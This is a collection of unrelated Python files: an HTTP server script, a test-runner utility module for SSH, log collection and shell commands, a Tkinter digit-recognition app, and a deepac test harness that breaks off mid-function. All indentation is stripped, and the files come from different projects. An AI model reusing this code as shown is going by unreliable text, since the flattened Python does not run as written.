except KeyboardInterrupt: # silly special cases that don't derive from Exception for common Unix ways to kill threads
pass
except Exception as e:
print(e)
finally:
if RequestHandler.serverInstance:
RequestHandler.serverInstance.close()
def runOnThread(port):
import threading
t = threading.Thread(target=run, args=(port,), daemon=True)
t.start()
import time
time.sleep(0.1)
def shutdown():
global __httpd
httpd = __httpd
if httpd:
httpd.shutdown()
if RequestHandler.serverInstance:
RequestHandler.serverInstance.close()
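# Example invocations (the script name is an assumption; adjust to the actual file name):
#   python3 server.py                  # sqlite3 backend, plain HTTP on port 12345
#   python3 server.py -p 8080 --https  # custom port, TLS using ~/.ssh/multiplay-server-*.pem
#   python3 server.py pickle           # pickle backend instead of sqlite3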
if __name__ == "__main__":
port = 12345
useSSL = False
for i, arg in enumerate(sys.argv):
if arg == '-p' or arg == '--port':
port = int(sys.argv[i + 1])
if arg == '--https':
useSSL = True
run(port, useSSL)
|
utils.py
|
import glob
import hashlib
import logging
import os
import shutil
import subprocess
from functools import wraps
from tempfile import gettempdir
from threading import Thread
import requests
from timeout_decorator import timeout
from utils.constants import Constant
from utils.format import Format
logger = logging.getLogger('testrunner')
_stepdepth = 0
def step(f):
@wraps(f)
def wrapped(*args, **kwargs):
global _stepdepth
_stepdepth += 1
logger.debug("{} entering {} {}".format(Format.DOT * _stepdepth, f.__name__,
f.__doc__ or ""))
r = f(*args, **kwargs)
logger.debug("{} exiting {}".format(
Format.DOT_EXIT * _stepdepth, f.__name__))
_stepdepth -= 1
return r
return wrapped
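# Illustrative use of the @step decorator (deploy_cluster is hypothetical and only
# sketches the pattern): entry and exit of the wrapped call are logged at debug
# level, with the marker repeated once per nesting depth.
#
#   @step
#   def deploy_cluster(conf):
#       """Deploy the test cluster"""
#       ...
#
# Nested @step functions therefore produce progressively deeper entry/exit markers.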
class Utils:
def __init__(self, conf):
self.conf = conf
@staticmethod
def chmod_recursive(directory, permissions):
os.chmod(directory, permissions)
for file in glob.glob(os.path.join(directory, "**/*"), recursive=True):
try:
os.chmod(file, permissions)
except Exception as ex:
logger.debug(ex)
@staticmethod
def cleanup_file(file):
if os.path.exists(file):
logger.debug(f"Cleaning up {file}")
try:
try:
# Attempt to remove the file first, because a socket (e.g.
# ssh-agent) is not a file but has to be removed like one.
os.remove(file)
except IsADirectoryError:
shutil.rmtree(file)
except Exception as ex:
logger.debug(ex)
else:
logger.debug(f"Nothing to clean up for {file}")
@staticmethod
def cleanup_files(files):
"""Remove any files or dirs in a list if they exist"""
for file in files:
Utils.cleanup_file(file)
def ssh_cleanup(self):
"""Remove ssh sock files"""
# TODO: also kill ssh agent here? maybe move pkill to kill_ssh_agent()?
sock_file = self.ssh_sock_fn()
sock_dir = os.path.dirname(sock_file)
try:
Utils.cleanup_file(sock_file)
# also remove tempdir if it's empty afterwards
if 0 == len(os.listdir(sock_dir)):
os.rmdir(sock_dir)
else:
logger.warning(f"Dir {sock_dir} not empty; leaving it")
except FileNotFoundError:
pass
except OSError as ex:
logger.debug(ex)
def collect_remote_logs(self, ip_address, logs, store_path):
"""
Collect logs from a remote machine
:param ip_address: (str) IP of the machine to collect the logs from
        :param logs: (dict: list) The different logs to collect {"files": [], "dirs": [], "services": []}
:param store_path: (str) Path to copy the logs to
:return: (bool) True if there was an error while collecting the logs
"""
logging_errors = False
for log in logs.get("files", []):
try:
self.scp_file(ip_address, log, store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {log} from {ip_address}\n {ex}")
logging_errors = True
for log in logs.get("dirs", []):
try:
self.rsync(ip_address, log, store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {log} from {ip_address}\n {ex}")
logging_errors = True
for service in logs.get("services", []):
try:
self.ssh_run(
ip_address, f"sudo journalctl -xeu {service} > {service}.log")
self.scp_file(ip_address, f"{service}.log", store_path)
except Exception as ex:
logger.debug(
f"Error while collecting {service}.log from {ip_address}\n {ex}")
logging_errors = True
return logging_errors
def authorized_keys(self):
public_key_path = self.conf.terraform.ssh_key + ".pub"
os.chmod(self.conf.terraform.ssh_key, 0o400)
with open(public_key_path) as f:
pubkey = f.read().strip()
return pubkey
def ssh_run(self, ipaddr, cmd):
key_fn = self.conf.terraform.ssh_key
cmd = "ssh " + Constant.SSH_OPTS + " -i {key_fn} {username}@{ip} -- '{cmd}'".format(
key_fn=key_fn, ip=ipaddr, cmd=cmd, username=self.conf.terraform.nodeuser)
return self.runshellcommand(cmd)
def scp_file(self, ip_address, remote_file_path, local_file_path):
"""
        Copies a remote file from the given ip to the given path
:param ip_address: (str) IP address of the node to copy from
:param remote_file_path: (str) Path of the file to be copied
:param local_file_path: (str) Path where to store the log
:return:
"""
cmd = (f"scp {Constant.SSH_OPTS} -i {self.conf.terraform.ssh_key}"
f" {self.conf.terraform.nodeuser}@{ip_address}:{remote_file_path} {local_file_path}")
self.runshellcommand(cmd)
def rsync(self, ip_address, remote_dir_path, local_dir_path):
"""
        Copies a remote dir from the given ip to the given path
:param ip_address: (str) IP address of the node to copy from
:param remote_dir_path: (str) Path of the dir to be copied
:param local_dir_path: (str) Path where to store the dir
:return:
"""
cmd = (f'rsync -avz --no-owner --no-perms -e "ssh {Constant.SSH_OPTS} -i {self.conf.terraform.ssh_key}" '
f'--rsync-path="sudo rsync" --ignore-missing-args {self.conf.terraform.nodeuser}@{ip_address}:{remote_dir_path} '
f'{local_dir_path}')
self.runshellcommand(cmd)
    def runshellcommand(self, cmd, cwd=None, env={}, ignore_errors=False, stdin=None):
        """Run a shell command in {workspace} if cwd is None
           Eg) cwd is "skuba": cmd will run in {workspace}/skuba/
               cwd is None: cmd will run in {workspace}
               cwd is an abs path: cmd will run in cwd
Keyword arguments:
cmd -- command to run
cwd -- dir to run the cmd
env -- environment variables
ignore_errors -- don't raise exception if command fails
stdin -- standard input for the command in bytes
"""
if not cwd:
cwd = self.conf.workspace
if not os.path.isabs(cwd):
cwd = os.path.join(self.conf.workspace, cwd)
if not os.path.exists(cwd):
            raise FileNotFoundError(Format.alert("Directory {} does not exist".format(cwd)))
if logging.DEBUG >= logger.level:
logger.debug("Executing command\n"
" cwd: {} \n"
" env: {}\n"
" cmd: {}".format(cwd, str(env) if env else "{}", cmd))
else:
logger.info("Executing command {}".format(cmd))
stdout, stderr = [], []
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd,
stdin=subprocess.PIPE if stdin else None, shell=True, env=env
)
if stdin:
p.stdin.write(stdin)
p.stdin.close()
stdoutStreamer = Thread(target = self.read_fd, args = (p, p.stdout, logger.debug, stdout))
stderrStreamer = Thread(target = self.read_fd, args = (p, p.stderr, logger.error, stderr))
stdoutStreamer.start()
stderrStreamer.start()
stdoutStreamer.join()
stderrStreamer.join()
# this is redundant, at this point threads were joined and they waited for the subprocess
# to exit, however it should not hurt to explicitly wait for it again (no-op).
p.wait()
stdout, stderr = "".join(stdout), "".join(stderr)
if p.returncode != 0:
if not ignore_errors:
raise RuntimeError("Error executing command {}".format(cmd))
else:
return stderr
return stdout
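    # Illustrative calls (paths are assumptions, not test-runner configuration);
    # with self.conf.workspace == "/tmp/ws":
    #   self.runshellcommand("ls")                  # runs in /tmp/ws
    #   self.runshellcommand("ls", cwd="skuba")     # runs in /tmp/ws/skuba
    #   self.runshellcommand("ls", cwd="/var/log")  # runs in /var/log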
def ssh_sock_fn(self):
"""generate path to ssh socket
A socket path can't be over 107 chars on Linux, so generate a short
hash of the workspace and use that in $TMPDIR (usually /tmp) so we have
a predictable, test-unique, fixed-length path.
"""
path = os.path.join(
gettempdir(),
hashlib.md5(self.conf.workspace.encode()).hexdigest(),
"ssh-agent-sock"
)
maxl = 107
if len(path) > maxl:
raise Exception(f"Socket path '{path}' len {len(path)} > {maxl}")
return path
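    # For example (illustrative only), every workspace path is reduced to its
    # 32-character md5 hex digest, yielding something like
    #   /tmp/<md5-of-workspace>/ssh-agent-sock
    # which stays well under the 107-character AF_UNIX limit regardless of how
    # long the workspace path itself is.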
def read_fd(self, proc, fd, logger_func, output):
"""Read from fd, logging using logger_func
Read from fd, until proc is finished. All contents will
also be appended onto output."""
while True:
contents = fd.readline().decode()
if contents == '' and proc.poll() is not None:
return
if contents:
output.append(contents)
logger_func(contents.strip())
@timeout(60)
@step
def setup_ssh(self):
os.chmod(self.conf.terraform.ssh_key, 0o400)
# use a dedicated agent to minimize stateful components
sock_fn = self.ssh_sock_fn()
# be sure directory containing socket exists and socket doesn't exist
if os.path.exists(sock_fn):
try:
if os.path.isdir(sock_fn):
                    os.rmdir(sock_fn)  # rmdir only removes an empty dir
else:
os.remove(sock_fn)
except FileNotFoundError:
pass
try:
os.mkdir(os.path.dirname(sock_fn), mode=0o700)
except FileExistsError:
if os.path.isdir(os.path.dirname(sock_fn)):
pass
else:
raise
# clean up old ssh agent process(es)
try:
self.runshellcommand("pkill -f 'ssh-agent -a {}'".format(sock_fn))
logger.warning("Killed previous instance of ssh-agent")
        except Exception:
pass
self.runshellcommand("ssh-agent -a {}".format(sock_fn))
self.runshellcommand(
"ssh-add " + self.conf.terraform.ssh_key, env={"SSH_AUTH_SOCK": sock_fn})
@timeout(30)
@step
def info(self):
"""Node info"""
info_lines = "Env vars: {}\n".format(sorted(os.environ))
info_lines += self.runshellcommand('ip a')
info_lines += self.runshellcommand('ip r')
info_lines += self.runshellcommand('cat /etc/resolv.conf')
        # TODO: the logic for retrieving the external IP is platform dependent and should be
        # moved to the corresponding platform
try:
r = requests.get(
'http://169.254.169.254/2009-04-04/meta-data/public-ipv4', timeout=2)
r.raise_for_status()
except (requests.HTTPError, requests.Timeout) as err:
            logger.warning(
                f'Metadata service unavailable; could not get external IP address: {err}')
else:
info_lines += 'External IP addr: {}'.format(r.text)
return info_lines
|
App.py
|
# TO-DO:-
# 1. Doesn't predict after the dataset is refreshed.
# 2. Train on the go: collect at least 5-6 samples and then train.
# 3. improve performance
# 4. More features.
# 5. test it
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from tkinter.font import Font
from PIL import ImageTk, Image, ImageDraw
import cv2
import threading
import numpy as np
import tensorflow as tf
import Dataset
import Model
import time
# ----------------------------------------------------------------- #
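# GuiLoop repeatedly schedules a callback ("master") through Tk's after() mechanism:
# "count" may be True (loop forever), False (never run) or an int (run that many
# times), and "speed" is the delay between iterations in milliseconds. Pause()/Play()
# suspend and resume the loop; StopLoop() cancels it and resets the counter.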
class GuiLoop():
def __init__(self, root, master, parameters=None, count=True, speed=100):
self.Brk = False
self.root = root
self.master = master
self.para = parameters
self.count = count
self._reset = count
self.speed = speed
self.task = ''
self._Loop()
def __call__(self, root, master, parameters=None, count=True, speed=100):
self.Brk = False
self.root = root
self.master = master
self.para = parameters
self.count = count
self._reset = count
self.speed = speed
self.task = ''
self.StopLoop()
self._Loop()
def config(self, **options):
self.master = options.get('master')
self.count = options.get('count',True)
self._reset = options.get('count',True)
self.speed = options.get('speed')
def _Loop(self):
if self.__run__() and self.master!=None and not self.Brk:
if self.para:self.master(self.para)
else: self.master()
self.task = self.root.after(self.speed, self._Loop)
def __run__(self):
if self.count==True and type(self.count)==bool:
return True
elif self.count==False and type(self.count)==bool:
return False
if type(self.count)==int:
if self.count>0:
self.count-=1
return True
else:
return False
else:
            print("\nInvalid entry: count can't be {}; "
                  "it must be either a boolean or an int".format(self.count))
def StopLoop(self, evt=None):
self.root.after_cancel(self.task)
self.count = self._reset
self.master = None
self.para = None
def Pause(self, evt=None):
self.Brk=True
self.root.after_cancel(self.task)
def Play(self, evt=None):
self.Brk=False
self._Loop()
# Loading animation
class Loading_Ani(Canvas):
def __init__(self, root=None, speed=100, size=80, color="#333", bg=None):
Canvas.__init__(self, root, bg=bg)
        self.config(highlightthickness=0, width=size, height=size)
self.create_text(size/2,(size/2), text="◜",fill=color, tags="Loading", font=Font(size=size+8))
self.__ = 0
self._loop = GuiLoop(self, self.Magic, speed=speed)
def Magic(self, evt=None):
if self.__==0:
self.itemconfig("Loading", text="◜")
self.__=1
elif self.__ ==1:
self.itemconfig("Loading", text="◝")
self.__=2
elif self.__ ==2:
self.itemconfig("Loading", text="◞")
self.__=3
elif self.__ ==3:
self.itemconfig("Loading", text="◟")
self.__=0
def hide(self):
self._loop.Pause()
self.itemconfig('Loading', state='hidden')
def show(self):
self._loop.Play()
self.itemconfig('Loading', state='normal')
# ----------------------------------------------------------------- #
graph = ''
model = ''
def load_model():
global model, graph
graph = tf.get_default_graph()
model = tf.keras.models.load_model("Digit_Reader1.h5")
load_model()
class Draw_Pad(Canvas):
def __init__(self, master, Width = 20, color = "white" ,*ag, **kw):
Canvas.__init__(self, master, *ag, **kw)
self.config(bg="#333", highlightthickness=1)
self.master = master
self.width = Width
self.color = color
self.train_count = 0
self.ThreadsL = []
self.Loading = False
self.Img = Image.new( "RGB", ( 300,300 ), (0,0,0) )
self.get_draw = ImageDraw.Draw( self.Img )
self.model = model
self.display_win()
self.master.bind("<Shift-Return>", self.Delete)
self.master.bind("<Button-2>", self.Delete)
self.master.bind("<Return>", self.predict)
self.bind("<B1-Motion>", self.draw)
self.Load_ani = Loading_Ani(self.master, speed=50, color="white", size=40, bg="#333")
self.Load_ani.place(relx=0.85, rely=0.9)
self.Load_ani.hide()
self.master.update()
self.after(100, self.details_help)
def details_help(self, evt=None):
messagebox.showinfo("Important Information",
"""
This is a Machine Learning Model
based on the Keras algorithm.
What does this do?
We can Recognise Hand-Written
digits from this model and can
also Train more.
How do I use?
1. Draw the digit on blank space.
2. Press Enter / Return key to predict.
3. Press Shift + Enter / Return key or
the Right Mouse Click to clear
the drawing.
Developed By :- Saad Mairaj
([email protected])
(6 February 2019)
""")
self.master.grab_set()
def Reser_Data(self, evt):
self.Load_ani.show()
Dataset.dataset_1()
Dataset.dataset_2()
self.after(200)
def Load():
            self.master.bind("<Return>", lambda _: messagebox.showinfo("Message",
                "Cannot predict while the model is training or refreshing"))
acc = Model.Train_Digit()
self.Acc.config(text="Acc: {}".format(acc))
self.update()
tf.keras.backend.clear_session()
load_model()
self.Load_ani.hide()
self.master.bind("<Return>", self.predict)
self.Thread2 = threading.Thread(target=Load)
self.Thread2.start()
def display_win(self, evt=None):
self.display = Canvas(self.master, bg="#333", width=300,
height=100, highlightthickness=0)
self.display.pack_propagate(0)
self.display.pack(side=BOTTOM)
self.L1 = Label(self.display, text = "Prediction: ",
font=("","15", "bold"), bg="#333", fg="white")
self.L1.pack(pady=5)
self.Ent = Entry(self.display, bg="#333", fg="white")
self.Ent.unbind_class("Entry", "<Key>")
def Check_charlimit(evt):
if evt.char in "0123456789":
self.Ent.delete(0, END)
self.Ent.insert(0, evt.char)
            if evt.keysym == "BackSpace":  # Tk's keysym for the backspace key is "BackSpace"
self.Ent.delete(0, END)
self.EntHide = Label(self.display, width=22, height=22, bg="#333")
self.EntHide.place(relx = 0.8, rely=0.1, height=20, width=20)
self.Ent.bind("<Key>", Check_charlimit)
self.style = ttk.Style()
self.style.configure('TCheckbutton', font=("","10"))
self.CkCmd = IntVar()
self.CkCmd.set(0)
def CkFun():
if self.CkCmd.get():
messagebox.showwarning("Warning",
"""Training the model is a Beta Version.
Usage:
1) Draw the digit and predict.
2) If the prediction is not correct,
then enter the right digit in the
entry box.
3) If the prediction is correct,
            then leave the entry box empty.
""")
self.EntHide.place_forget()
self.Ent.place(relx = 0.8, rely=0.1, height=20, width=20)
self.Ent.lift()
self.display.update_idletasks()
self.display.update()
else:
self.Ent.place_forget()
self.display.update()
self.display.update_idletasks()
self.EntHide.place(relx = 0.8, rely=0.1, height=20, width=20)
self.Ckb = ttk.Checkbutton(self.display, style="TCheckbutton",
text="Train The Model", variable=self.CkCmd, onvalue=1,
offvalue=0, command=CkFun)
self.Ckb.pack(pady=5)
self.Acc = Label(self, text="Acc: {}".format(97.22),
fg="white", bg="#333", font=("", 10))
self.Acc.place(x=10, y=10)
self.Restart = Label(self, text="⟲", bg="#333", fg="white",
font=("","16"))
self.Restart.place(x=260, y=10)
self.Restart.bind("<Enter>", lambda _: self.Restart.config(fg="red"))
self.Restart.bind("<Leave>", lambda _: self.Restart.config(fg="white"))
self.Restart.bind("<Button-1>", self.Reser_Data)
self.HelpL = Label(self.display, text="ⓘ", fg="white", bg="#333")
self.HelpL.place(x=10, y=10)
self.HelpL.bind("<Enter>", lambda _: self.HelpL.config(fg="red"))
self.HelpL.bind("<Leave>", lambda _: self.HelpL.config(fg="white"))
self.HelpL.bind("<Button-1>", lambda _: self.HelpL.config(fg="white"))
self.HelpL.bind("<Button-1>", self.details_help, "+")
def draw(self, evt):
x1 = evt.x
y1 = evt.y
x2 = evt.x + self.width
y2 = evt.y + self.width
self.create_oval( x1, y1, x2, y2,
fill=self.color, outline=self.color )
self.get_draw.ellipse( [x1,y1, x2,y2], fill="white" )
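    # predict() mirrors the canvas drawing into a PIL image, saves it, reloads it as
    # grayscale, downscales it to the 28x28 input expected by the Keras model and
    # reshapes it to (1, 28, 28, 1) before calling model.predict(). If the
    # "Train The Model" checkbox is set, the sample (optionally relabelled via the
    # entry box) is added to the dataset and retraining is triggered after 6 samples.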
def predict(self, evt):
self.Img.save("Yo.png")
self.Img_arr = cv2.imread("Yo.png", cv2.IMREAD_GRAYSCALE)
self.Img_arr = cv2.resize( self.Img_arr, (28,28) )
self.New_arr = self.Img_arr.reshape(-1, 28, 28, 1)
with graph.as_default():
pre = self.model.predict( [self.New_arr] )
pre = np.argmax(pre[0])
print("\n", pre, "\n")
self.L1.config( text="Prediction: {}".format(pre) )
self.master.update()
if self.Ent.get():
pre = int(self.Ent.get())
print(pre)
if self.CkCmd.get():
Dataset.add(self.Img_arr, pre)
self.train_count+=1
if self.train_count >= 6 :
def Train():
self.Restart.bind("<Button-1>", lambda _: messagebox.showinfo("Message",
"Cannot perform this action while the model is already training"))
self.Load_ani.show()
acc = Model.Train_Digit()
self.Acc.config(text="Acc: {}".format(acc))
self.Load_ani.hide()
self.Restart.bind("<Button-1>", self.Reser_Data)
self.master.update()
self.Thread = threading.Thread(target=Train)
self.ThreadsL.append(self.Thread)
                if not self.ThreadsL[0].is_alive():
self.Thread.start()
self.train_count = 0
self.ThreadsL.clear()
self.ThreadsL.append(self.Thread)
self.Loading = True
self.train_count = 0
if self.ThreadsL and self.Loading:
            if not self.ThreadsL[0].is_alive():
self.master.bind("<Return>", lambda _: messagebox.showinfo("Message",
"Please wait while the model is still loading"))
load_model()
self.model = model
self.master.bind("<Return>", self.predict)
self.Loading = False
self.master.update()
self.master.update_idletasks()
def Delete(self, evt):
self.delete("all")
self.Img = Image.new( "RGB", ( 300,300 ), (0,0,0) )
self.get_draw = ImageDraw.Draw( self.Img )
if __name__ == "__main__":
root = Tk()
root.resizable(0,0)
root.title("Digit Recognition")
root.config(bg="#333", highlightthickness=2)
root.update_idletasks()
x_cord = int( (root.winfo_screenwidth() / 2) - 150 )
y_cord = int( (root.winfo_screenheight() / 2) - 250 )
root.geometry("300x400+{}+{}".format(x_cord, y_cord))
win = Draw_Pad(root, width=300, height=300)
win.pack(side=TOP)
root.mainloop()
|
testcalls.py
|
import tensorflow as tf
from deepac.predict import predict_fasta, filter_fasta
from deepac.nn_train import RCConfig, RCNet
from deepac.eval.eval import evaluate_reads
from deepac.eval.eval_ens import evaluate_ensemble
from deepac.convert import convert_cudnn
from deepac import preproc
from deepac.tests import datagen
from deepac.tests.rctest import compare_rc
from deepac.builtin_loading import BuiltinLoader
from deepac import __file__
from deepac.explain.tests import ExplainTester
from deepac.gwpa.tests import GWPATester
from multiprocessing import Process
import configparser
import os
class Tester:
"""
Tester class.
"""
def __init__(self, n_cpus=8, builtin_configs=None, builtin_weights=None, explain=False, gwpa=False, do_all=False,
do_quick=False, keep=False, scale=1, tpu_resolver=None, input_modes=None, additivity_check=False,
large=False):
self.n_cpus = n_cpus
self.builtin_configs = builtin_configs
self.builtin_weights = builtin_weights
self.bloader = BuiltinLoader(builtin_configs, builtin_weights)
self.explain = explain
self.gwpa = gwpa
self.do_all = do_all
self.do_quick = do_quick
self.keep = keep
self.scale = scale
self.tpu_resolver = tpu_resolver
self.additivity_check = additivity_check
self.do_large = large
self.test_config = "nn-test-L.ini" if self.do_large else "nn-test.ini"
# all by default, unless using a TPU when it defaults to memory
self.input_modes = ["memory"] if tpu_resolver is not None and input_modes is None else input_modes
# all are true by default, unless input_modes is specified
do_sequence_input = self.input_modes is None or "sequence" in input_modes
if float(tf.__version__[:3]) == 2.2:
print('Disabling keras Sequence input in TF 2.2.')
do_sequence_input = False
self.input_modes_dict = {"memory": self.input_modes is None or "memory" in input_modes,
"sequence": do_sequence_input,
"tfdata": self.input_modes is None or "tfdata" in input_modes}
def run_datagen(self, npy=True, tfrec=True):
print("TEST: Generating data...")
datagen.generate_sample_data(n_train=1024 * self.scale, n_val=1024 * self.scale)
print("TEST: Preprocessing data...")
self.test_preproc(npy, tfrec)
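    # For example (illustrative values), constructing the Tester with
    # input_modes=["memory", "tfdata"] yields
    # input_modes_dict == {"memory": True, "sequence": False, "tfdata": True},
    # so only the in-memory .npy and tfrecord input paths are exercised below.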
def run_tests(self):
"""Generate sample data and run all tests."""
if not self.keep and os.path.exists("deepac-tests"):
print("Deleting previous test output...")
for root, dirs, files in os.walk("deepac-tests", topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
quick = self.do_quick or self.explain or self.gwpa
gwpatester = None
if not self.keep:
self.run_datagen(npy=True,
tfrec=self.input_modes_dict["tfdata"])
print("TEST: Training...")
self.test_train(quick)
print("TEST: Predicting...")
self.test_pred(quick)
print("TEST: Evaluating...")
self.test_eval()
print("TEST: Converting...")
self.test_convert()
print("TEST: Continuing training...")
self.test_train(quick=True, epoch_start=2, epoch_end=4)
print("TEST: Filtering...")
self.test_filter()
if self.do_all or self.gwpa:
gwpatester = GWPATester(self.n_cpus, self.additivity_check)
print("X-TEST: gff2genome...")
gwpatester.test_gff2genome()
print("X-TEST: Fragmenting genomes...")
gwpatester.test_fragment()
print("X-TEST: Genome-wide phenotype potential map...")
gwpatester.test_genomemap()
print("X-TEST: Gene ranking...")
gwpatester.test_granking()
print("X-TEST: Filter activations...")
gwpatester.test_factiv()
print("X-TEST: Filter enrichment...")
gwpatester.test_fenrichment()
if self.do_all or self.explain:
explaintester = ExplainTester(self.n_cpus, self.additivity_check)
print("X-TEST: Maxact (DeepBind)...")
explaintester.test_maxact()
# SHAP
print("X-TEST: Filter contributions (DeepLIFT)...")
explaintester.test_fcontribs()
print("X-TEST: Filter ranking...")
explaintester.test_franking()
print("X-TEST: fa2transfac...")
explaintester.test_fa2transfac()
print("X-TEST: Weblogos...")
explaintester.test_weblogos()
print("X-TEST: Extended weblogos...")
explaintester.test_weblogos_extended()
print("X-TEST: transfac2IC...")
explaintester.test_transfac2ic()
print("X-TEST: Motif comparison...")
explaintester.test_motif_compare()
if self.do_all or self.gwpa:
print("X-TEST: Nucleotide contribution map...")
gwpatester.test_ntcontribs()
print("TEST: OK")
def test_preproc(self, npy=True, tfrec=True):
"""Test preprocessing."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "preproc-train.ini"))
if npy:
config['Options']['Use_TFData'] = "False"
preproc.preproc(config)
assert (os.path.isfile(os.path.join("deepac-tests", "sample_train_data.npy"))), "Preprocessing failed."
assert (os.path.isfile(os.path.join("deepac-tests", "sample_train_labels.npy"))), "Preprocessing failed."
if tfrec:
config['Options']['Use_TFData'] = "True"
config['Options']['Do_shuffle'] = "True"
p = Process(target=preproc.preproc, args=(config,))
p.start()
p.join()
assert (os.path.isfile(os.path.join("deepac-tests", "sample_train_data",
"sample_train_data_0-{}.tfrec".format(128*self.scale-1)))),\
"TFData Preprocessing failed."
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", "preproc-val.ini"))
if npy:
config['Options']['Use_TFData'] = "False"
preproc.preproc(config)
assert (os.path.isfile(os.path.join("deepac-tests", "sample_val_data.npy"))), "Preprocessing failed."
assert (os.path.isfile(os.path.join("deepac-tests", "sample_val_labels.npy"))), "Preprocessing failed."
if tfrec:
config['Options']['Use_TFData'] = "True"
config['Options']['Do_shuffle'] = "True"
p = Process(target=preproc.preproc, args=(config,))
p.start()
p.join()
assert (os.path.isfile(os.path.join("deepac-tests", "sample_val_data",
"sample_val_data_0-{}.tfrec".format(128*self.scale-1)))),\
"TFData Preprocessing failed."
def test_train(self, quick=False, epoch_start=0, epoch_end=2):
"""Test training."""
config = configparser.ConfigParser()
config.read(os.path.join(os.path.dirname(__file__), "tests", "configs", self.test_config))
if self.input_modes_dict["memory"]:
print("TEST: Training (custom - .npy in memory)...")
config['DataLoad']['Use_TFData'] = "False"
config['DataLoad']['LoadTrainingByBatch'] = "False"
paprconfig = RCConfig(config)
self.__config_train(paprconfig, epoch_start, epoch_end).train()
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"training-deepac-test.csv"))), "Training failed."
if self.input_modes_dict["sequence"]:
print("TEST: Training (custom - keras sequence)...")
config['DataLoad']['Use_TFData'] = "False"
config['DataLoad']['LoadTrainingByBatch'] = "True"
paprconfig = RCConfig(config)
self.__config_train(paprconfig, epoch_start, epoch_end).train()
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"training-deepac-test.csv"))), "Training failed."
if self.input_modes_dict["tfdata"]:
print("TEST: Training (custom - tfrecord)...")
config['DataLoad']['Use_TFData'] = "True"
paprconfig = RCConfig(config)
self.__config_train(paprconfig, epoch_start, epoch_end).train()
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"deepac-test-e{epoch:03d}.h5".format(epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "deepac-test-logs",
"training-deepac-test.csv"))), "Training failed."
if not quick:
if self.input_modes_dict["memory"]:
print("TEST: Training (rapid - .npy in memory)...")
paprconfig = self.bloader.get_rapid_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = False
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["sequence"]:
print("TEST: Training (rapid - keras sequence)...")
paprconfig = self.bloader.get_rapid_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["tfdata"]:
print("TEST: Training (rapid - tfrecord)...")
paprconfig = self.bloader.get_rapid_training_config()
paprconfig.use_tf_data = True
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["memory"]:
print("TEST: Training (sensitive - .npy in memory)...")
paprconfig = self.bloader.get_sensitive_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = False
self.__config_train(paprconfig, epoch_start, epoch_end).train()
runname = paprconfig.runname
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_start+1)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{runname}-logs".format(runname=runname),
"{runname}-e{epoch:03d}.h5".format(runname=runname,
epoch=epoch_end)))),\
"Training failed."
assert (os.path.isfile(os.path.join("deepac-tests", "{}-logs".format(runname),
"training-{}.csv".format(runname)))), "Training failed."
if self.input_modes_dict["sequence"]:
print("TEST: Training (sensitive - keras sequence)...")
paprconfig = self.bloader.get_sensitive_training_config()
paprconfig.use_tf_data = False
paprconfig.use_generators_keras = True
